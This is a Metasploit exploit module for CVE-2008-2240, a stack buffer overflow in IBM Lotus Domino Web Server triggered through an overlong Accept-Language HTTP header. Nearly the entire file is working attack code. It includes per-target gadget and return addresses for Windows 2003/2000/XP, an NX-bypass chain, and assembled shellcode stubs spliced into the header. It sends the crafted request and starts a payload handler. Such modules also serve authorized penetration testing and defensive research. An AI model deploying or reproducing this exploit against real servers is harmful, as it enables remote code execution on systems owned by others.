modules/exploits/windows/lotus/domino_http_accept_language.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 114 bytes.
},
'Author' => [ 'Fairuzan Roslan <riaf[at]mysec.org>', '<Earl Marcus klks[at]mysec.org>' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2008-2240'],
['OSVDB', '45415'],
['BID', '29310'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x20\x2c\x3b",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dl
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll
'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'JmpESP' => 0x62c6072e, # jmp esp @lsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
],
'DisclosureDate' => '2008-05-20'))
end
def exploit
connect
lang = rand_text_alphanumeric(116) # greetz to hateful chris
lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi)
lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax)
lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash
lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1
lang << "\x00"
lang << payload.encoded
if(not target['DisableNX'])
lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4
lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2
lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top
else
lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8
lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2
lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3
lang[ 88, 4 ] = [target['Ret']].pack('V') # 4
lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6
lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top
lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5
end
uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger
print_status("Trying target #{target.name}...")
send_request_raw({
'uri' => "#{uri}",
'method' => 'GET',
'headers' =>
{
'Accept' => '*/*',
'Accept-Language' => "#{lang}",
'Accept-Encoding' => 'gzip,deflate',
'Keep-Alive' => '300',
'Connection' => 'keep-alive',
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
}
}, 5)
handler
disconnect
end
end